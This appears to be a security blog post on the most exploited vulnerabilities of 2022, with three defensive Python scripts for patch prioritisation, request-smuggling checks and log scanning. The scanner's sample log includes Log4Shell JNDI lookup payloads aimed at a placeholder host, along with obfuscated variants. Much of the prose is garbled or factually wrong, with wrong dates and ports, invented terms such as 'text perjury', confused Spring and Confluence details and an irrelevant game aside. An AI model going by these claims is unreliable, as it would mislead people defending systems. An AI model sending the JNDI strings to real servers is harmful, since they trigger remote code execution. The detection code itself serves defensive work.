What will be the most dangerous vulnerabilities exploited in 2022? It’s hard to say for sure, but we can make some educated guesses based on current trends and history.
This blog post will examine some of the most dangerous ones and explain why they’re so risky. We’ll also offer some advice on how to protect yourself against them. So read on to learn more.
Vulnerability Management and exploited vulnerabilities catalog
Many organizations are struggling with patch management. On average, it takes an organization 60 days to patch a critical vulnerability; less dangerous ones can take longer, if they are addressed at all.
Last year, over half of the identified system vulnerabilities dated from two years earlier. Many threat actors will therefore go after older technology in 2022: those bugs still have plenty of exposed targets online, and exploiting known flaws is easier money than developing attacks against new software.
Vulnerability Management challenges
But why does it take so long for organizations to patch their systems? It’s often a combination of budget, technology complexity, and human error.
While some may argue that throwing money at the problem will solve it, there are still practical limitations to consider, such as outdated hardware or software that can't be upgraded easily.
And while human error certainly plays a role in slow patching in some cases, it's important to note that the delay is often due to the sheer complexity of managing multiple patches across various technology systems and ensuring they don't cause unexpected disruptions or failures.
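The two figures above (60 days to patch a critical, and most findings being two years old) are what a patch queue looks like when it is worked in arrival order. The following script is an added example, not a tool from the post or any vendor: it ranks a vulnerability inventory by CVSS, by days past a remediation SLA, and by membership in a known-exploited catalog, so that an old, actively exploited bug on a domain controller rises above a fresh medium-severity one. The SLA bands, the inventory and the catalog contents are all constructed for illustration; the CVE ids are the ones this post discusses plus one placeholder.

```python
"""Rank a vulnerability inventory for patching by severity, SLA overrun and
known exploitation. Added example for this post, not a tool the post describes;
the SLA bands, the inventory and the "exploited" catalog below are all
constructed for illustration."""
from dataclasses import dataclass
from datetime import date


@dataclass(frozen=True)
class Finding:
    cve: str
    host: str
    cvss: float
    published: date  # date the vendor advisory was published


def sla_days(cvss: float) -> int:
    """Assumed remediation policy: days allowed from publication, by CVSS band."""
    if cvss >= 9.0:
        return 15
    if cvss >= 7.0:
        return 30
    return 90


def score(finding: Finding, today: date, exploited: set) -> dict:
    """Return the finding's priority score together with the numbers behind it.

    Score = 10 * CVSS, +100 if the CVE is in the exploited catalog, plus one
    point per day past SLA (capped at 365 so age alone cannot outrank a
    freshly exploited critical)."""
    age = (today - finding.published).days
    overdue = age - sla_days(finding.cvss)
    in_catalog = finding.cve in exploited
    total = finding.cvss * 10
    if in_catalog:
        total += 100
    if overdue > 0:
        total += min(overdue, 365)
    return {"cve": finding.cve, "host": finding.host, "score": total,
            "age_days": age, "overdue_days": overdue, "exploited": in_catalog}


def rank(findings, today: date, exploited: set) -> list:
    """Highest score first; ties broken by CVE id for a stable report."""
    rows = [score(f, today, exploited) for f in findings]
    rows.sort(key=lambda r: (-r["score"], r["cve"]))
    return rows


# Constructed sample data. The CVE ids are the ones discussed in the post; the
# last id is a placeholder standing for any low-severity finding.
EXPLOITED_CATALOG = {"CVE-2021-44228", "CVE-2020-1472"}
INVENTORY = [
    Finding("CVE-2021-44228", "web-01", 10.0, date(2021, 12, 10)),
    Finding("CVE-2022-30190", "ws-17", 7.8, date(2022, 5, 30)),
    Finding("CVE-2020-1472", "dc-01", 10.0, date(2020, 8, 11)),
    Finding("CVE-0000-00000", "print-02", 5.3, date(2022, 6, 20)),  # placeholder id
]

if __name__ == "__main__":
    for row in rank(INVENTORY, date(2022, 7, 1), EXPLOITED_CATALOG):
        flag = "EXPLOITED" if row["exploited"] else ""
        print(f'{row["score"]:6.0f}  {row["cve"]:16} {row["host"]:9} '
              f'age={row["age_days"]:4}d overdue={row["overdue_days"]:5}d {flag}')
```

Run it as-is and the ZeroLogon finding on the domain controller comes out first despite having the same CVSS as Log4Shell, because it has been past SLA far longer; the placeholder medium finding stays at the bottom with a negative overdue count. Swap the constructed lists for a scanner export and the catalog feed you actually use, and the overdue column becomes the metric to track against the 60-day figure.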
Here are the most dangerous known exploited vulnerabilities in 2022
The ProxyLogon bug has been exploited by hackers to bypass authentication and thereby impersonate an administrator.
Because internal infrastructure often goes without updates, this remains one of the most exploited vulnerabilities of 2022, if not the most exploited. The vulnerability was first published in August 2021, when it received attention from the DEVCORE team, who added it to their automated toolkits. Those toolkits are used by many threat actors today because the bug can be abused without user interaction, over port 433, giving access to everything that follows: lateral movement, persistent access, remote control, and so on.
The ZeroLogon vulnerability, also known as CVE-2020-1472, has been around since August last year. It allows an adversary to connect to the MS Netlogon Remote Protocol without ever being challenged for credentials, using NTLM logons instead, which gives them full access to any system they want. This is why you should always make sure your passwords are unique.
Microsoft Defender detects these attacks now, but keep your eyes open when browsing online.
In addition, there's another thing called "Zero logs." It means "Zero Login"; lately, we've seen more websites exploited through adverts or attachments, sometimes even both at once.
So be sure to have a different password for all your accounts and enable 2-factor authentication wherever possible. This will significantly reduce the likelihood of someone gaining access to your sensitive information.
But wait, there’s more. Changing your passwords regularly is also essential because even if someone doesn’t gain access to your account with a current password, they could crack it with enough time and computing power.
So, keep those passwords fresh. And make sure to use a mix of numbers, symbols, and upper and lowercase letters to make them harder to crack.
Log4Shell remote code execution (CVE-2021-44228)
This year, Log4Shell is causing chaos. It surfaced in late 2021, and threat actors explore it heavily to find remote code execution conditions where they can download malicious payloads onto your servers. This vulnerability affects the popular Apache Java logging library, Log4j.
An online report discussed how cybercriminals use remote code execution vulnerabilities to gain complete control over systems. We also learned about their tactics for installing cryptocurrency mining software.
More recently, they have deployed Cobalt Strike, which helps them steal user credentials while staying anonymous, using malware or tricks like watering down pages loading in your browser before infection (a technique called "text perjury").
The last stage of malicious activity is ransomware deployment, where hackers count on victims not having access controls set up correctly.
Otherwise, they will release sensitive data onto dangerous websites, giving away all markers associated with past activity and allowing for potential identity theft.
VMware vSphere client (CVE-2021-21972)
The VMware vSphere Client (HTML5) recently patched a remote code execution vulnerability that an insider could exploit to escalate privileges and take control over port 443.
This is one of many potential points of access to your entire infrastructure. You must know how this affects IT operations and day-to-day business activities such as web browsing or emailing friends outside work.
The PetitPotam weakness lives in Windows domains and servers where AD CS has not been configured with defenses against NTLM relay attacks.
A threat actor can take control of a domain controller by forcing it to authenticate to him and accept his connections, even if they only carry unclassified information. This means that all data sent during this time will be encrypted using a key controlled only by the attacker and no one else.
To remediate these issues, you need to either install KB5005413, make sure the services that allow authentication use Extended Protection for Authentication (EPA), add checks such as password sanity checks before accepting connection requests, or disable NTLM altogether if it isn't necessary for your organization.
As always, keep up to date with the latest patches and fixes from Microsoft and follow best practices to prevent these attacks from happening in the first place.
Follina CVE-2022-30190 remote code execution vulnerability
Follina is a remote code execution vulnerability that saw heavy exploitation in 2022. It affects the Microsoft Support Diagnostic Tool (MSDT) and can be triggered through malicious documents that reach the tool via Microsoft's URL handlers.
This allows launching an executable with administrator privileges on targeted systems, giving hackers full system compromise.
ICMAD (CVE-2022-22536)
SAP's Internet Communication Manager (ICM) has been found vulnerable, scoring a 10 on the CVSS 3.1 scale. The flaw permits HTTPS request smuggling, where data controlled by an attacker can be injected at your system's startup under a user's identity, breaking confidentiality, availability, and integrity.
Cybersecurity experts also noted recently that some users might experience issues with their browsers when visiting certain websites. Reading through the reports, we found more about this particular bug: Franco Yelo and Skyline are credited with discovering the ICM request smuggling flaw.
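Request smuggling in general works because two components in the request path disagree about where a request ends, and that disagreement always starts with ambiguous framing headers. The script below is an added example, not code from the post or from SAP: it is the generic check a reverse proxy or WAF applies to a captured request (conflicting or duplicated Content-Length, Content-Length alongside Transfer-Encoding, an unusual Transfer-Encoding value, whitespace tricks in header names, a body that does not match the declared length). It is not specific to the ICM bug, and the sample requests, host name and path are constructed.

```python
"""Flag ambiguous request framing in a captured HTTP request: the header
combinations that let a front end and back end disagree about where one
request ends and the next begins. Added example for this post; it is a generic
check of the kind a reverse proxy or WAF applies, not ICMAD-specific, and the
sample requests are constructed."""


def parse_request(raw: bytes):
    """Split a raw request into (request line, [(name, value)], body).
    Header names are kept exactly as sent so whitespace tricks stay visible;
    values are stripped, as a compliant parser would."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = []
    for line in lines[1:]:
        if not line:
            continue
        name, _, value = line.partition(b":")
        headers.append((name.decode("latin-1"), value.decode("latin-1").strip()))
    return lines[0].decode("latin-1"), headers, body


def smuggling_indicators(raw: bytes) -> list:
    """Return a list of human-readable reasons this request's framing is ambiguous."""
    _, headers, body = parse_request(raw)
    issues = []
    cl = [v for n, v in headers if n.strip().lower() == "content-length"]
    te = [v for n, v in headers if n.strip().lower() == "transfer-encoding"]
    if cl and te:
        issues.append("Content-Length and Transfer-Encoding both present")
    if len(set(cl)) > 1:
        issues.append("conflicting Content-Length values")
    if any(not v.isdigit() for v in cl):
        issues.append("non-numeric Content-Length")
    for v in te:
        # "xchunked" and similar are treated as chunked by some servers and ignored by others
        if v.lower() != "chunked":
            issues.append(f"unusual Transfer-Encoding value {v!r}")
    for n, _ in headers:
        # "Transfer-Encoding : chunked" or a leading space (obsolete folding) is parsed
        # as a header by some servers and dropped by others
        if n != n.strip():
            issues.append(f"whitespace around header name {n!r}")
    if len(set(cl)) == 1 and cl[0].isdigit():
        declared = int(cl[0])
        if len(body) != declared:
            issues.append(f"body length {len(body)} does not match Content-Length {declared}")
    return issues


# Constructed sample requests (host name and path are placeholders).
CLEAN = (b"POST /api/ping HTTP/1.1\r\nHost: erp.example\r\n"
         b"Content-Length: 5\r\n\r\nhello")
CL_AND_TE = (b"POST /api/ping HTTP/1.1\r\nHost: erp.example\r\n"
             b"Content-Length: 4\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\n")
OBFUSCATED_TE = (b"POST /api/ping HTTP/1.1\r\nHost: erp.example\r\n"
                 b"Transfer-Encoding : xchunked\r\n\r\n")
DUPLICATE_CL = (b"POST /api/ping HTTP/1.1\r\nHost: erp.example\r\n"
                b"Content-Length: 4\r\nContent-Length: 9\r\n\r\nabcd")

if __name__ == "__main__":
    for label, req in [("clean", CLEAN), ("cl+te", CL_AND_TE),
                       ("obfuscated te", OBFUSCATED_TE), ("duplicate cl", DUPLICATE_CL)]:
        print(label, "->", smuggling_indicators(req) or "ok")
```

The body-length comparison assumes one whole request per capture; on a live stream with pipelining it would need to consume exactly the declared bytes instead. The useful defensive stance is the one the check encodes: a request whose length can be read two ways should be rejected at the edge, not forwarded and interpreted twice.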
Attackers can exploit these critical vulnerabilities by supplying specially crafted SpEL expressions as routing expressions, resulting in RCE.
As seen with the recent Trine 2 game, which appeared on Steam before its official debut (and was quickly pulled), there's always some vulnerability waiting around the corner, including the one found in Spring4Shell, which the CVSS scoring system rates 9 out of a maximum 10 for severity and 8 out of 10 for exploitability and impact.
To protect your systems, the latest version, 1.0.6-SNAPSHOT, disables evaluation by default to prevent malicious SpEL expressions from being executed during routing. Keeping your software updated with the latest versions and patches is the best way to avoid potential attacks.
This is another vulnerability in the family of Spring vulnerabilities that have scored 10 on the CVSS. The new exploit, CVE-2022-22947, performs arbitrary code injection resulting in total compromise of confidentiality, availability, and integrity on vulnerable versions of Spring Cloud Gateway (SCG) when it is publicly accessible; that's bad news for anyone who uses this software.
Vulnerabilities found in Atlassian Confluence allow unauthenticated users to achieve RCE. They are rated nine on the CVSS scale and were frequently exploited by cybercriminals, who installed crypto miners, web shells, or malware on vulnerable systems using this vulnerability (CVE-2022).
An OGNL injection allowed access that wasn't intended when these issues were exploited; an additional problem was then discovered: hardcoded credentials that malicious actors could use once they knew where to find them, accessible via a Twitter account info leak or through the installation of a backdoor.
To protect against these issues, it’s essential to update to the latest version of Confluence (6.13.5 at the time of writing) and implement appropriate access control policies to limit who can perform administrative tasks on your server.
Regularly monitoring logs for unexpected behavior or network traffic can also help catch malicious activity early on.
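Log monitoring only catches these two families (the Log4Shell lookups above and the OGNL injection just described) if the scan normalises what attackers actually send: URL-encoded paths, and JNDI strings split across nested `${lower:...}` or `${::-...}` lookups. The scanner below is an added example, not code from the post, from Apache, or from Atlassian: it parses combined-format access log lines, folds the published obfuscation forms, and reports a JNDI lookup in any request field or expression syntax in a request path. The log lines are constructed, and the normalisation covers the documented tricks rather than every possible variant.

```python
"""Scan web access log lines for JNDI lookup strings (Log4Shell) and for
expression syntax in request paths (the OGNL injection pattern behind the
Confluence flaws). Added example for this post; the log lines are constructed
and the normalisation covers the published lookup-obfuscation tricks, not
every possible variant."""
import re
from urllib.parse import unquote

# Apache/nginx "combined" log format, assumed as the input shape.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
# ${lower:x} / ${upper:x} case-conversion lookups, used to split the word "jndi"
CASE_LOOKUP_RE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# ${anything:-x} default-value lookups, e.g. ${::-j}, which resolve to x
DEFAULT_LOOKUP_RE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")


def normalize(value: str, rounds: int = 5) -> str:
    """URL-decode twice, then fold nested lookups from the inside out."""
    value = unquote(unquote(value))
    for _ in range(rounds):
        folded = CASE_LOOKUP_RE.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            value)
        folded = DEFAULT_LOOKUP_RE.sub(lambda m: m.group(1), folded)
        if folded == value:
            break  # nothing left to fold
        value = folded
    return value


def classify(field: str, value: str):
    """Return (kind, normalised evidence) or None for a single log field."""
    norm = normalize(value)
    if "jndi:" in norm.lower():
        return "jndi-lookup", norm
    if field == "path" and "${" in norm:
        return "expression-in-path", norm
    return None


def scan_log(text: str) -> list:
    """Return one finding dict per suspicious field, in line order."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skipped here, worth counting in a real pipeline
        parts = m.group("req").split(" ")
        path = parts[1] if len(parts) >= 2 else m.group("req")
        for field, value in (("path", path), ("referer", m.group("ref")), ("user_agent", m.group("ua"))):
            hit = classify(field, value)
            if hit:
                findings.append({"line": line_no, "src_ip": m.group("ip"),
                                 "field": field, "kind": hit[0], "evidence": hit[1]})
    return findings


# Constructed sample log: one clean request, a plain JNDI lookup in the
# User-Agent, an obfuscated one, an encoded ${...} expression in the path,
# and a line that is not in combined format at all.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Dec/2021:10:00:02 +0000] "GET /login HTTP/1.1" 200 812 "-" "${jndi:ldap://lookup.example/a}"
198.51.100.8 - - [10/Dec/2021:10:00:03 +0000] "GET /login HTTP/1.1" 200 812 "-" "${${lower:j}${::-n}di:ldap://lookup.example/b}"
203.0.113.9 - - [03/Jun/2022:09:12:44 +0000] "GET /%24%7B1%2B1%7D/ HTTP/1.1" 302 0 "-" "curl/7.79"
this line is not in combined format
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f'line {f["line"]}: {f["kind"]} from {f["src_ip"]} in {f["field"]}: {f["evidence"]}')
```

Two design points: the evidence column stores the normalised string, so an analyst sees `${jndi:...}` rather than the split form that was logged, and the scanner checks every request field rather than only the path, because the Log4Shell string was commonly delivered in headers that application code logged without thinking. Pipe real access logs through `scan_log` and treat any hit as a trigger to check whether the application behind that path is still on a vulnerable version.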
Remember to keep your software up-to-date and practice good security hygiene to protect yourself against threats.
The Confluence wiki-style service is widely deployed in enterprise environments and is actively exploited by unauthenticated users, since it can be reached without permission.
Confluence's security weakness allows anyone who knows how to navigate the system, even without permissions or without being logged on as root, i.e., "someone else" (such as malware), to exploit this vulnerability through direct network access from outside the firewall, with no special requirements beyond being able to connect directly to the services running on localhost.
This also means that every application using WebSockets might suddenly become risky, so consider carefully which ones meet the appropriate safety level.
To address this same vulnerability, the Confluence team released a patch update, but it’s important to note that you must upgrade your Confluence instance for the fix to take effect.
Additionally, if you have doubts about how secure your current setup is, it's always best to consult a professional IT team or service provider to ensure the integrity and safety of your network.
As always, staying up-to-date on the latest security updates for all software in your organization is crucial; proactive measures can save a lot of headaches and potential damage down the road.
So, what should you do to stay safe? Check out our website for more information on the most dangerous vulnerabilities exploited in 2022 and how you can protect yourself.
We’ll keep you up-to-date on all the latest cybersecurity news and information, so you can rest easy knowing that your data is safe.
And remember, prevention is always better than cure, so start implementing some tips we’ve shared today to help secure your online presence. Thanks for reading.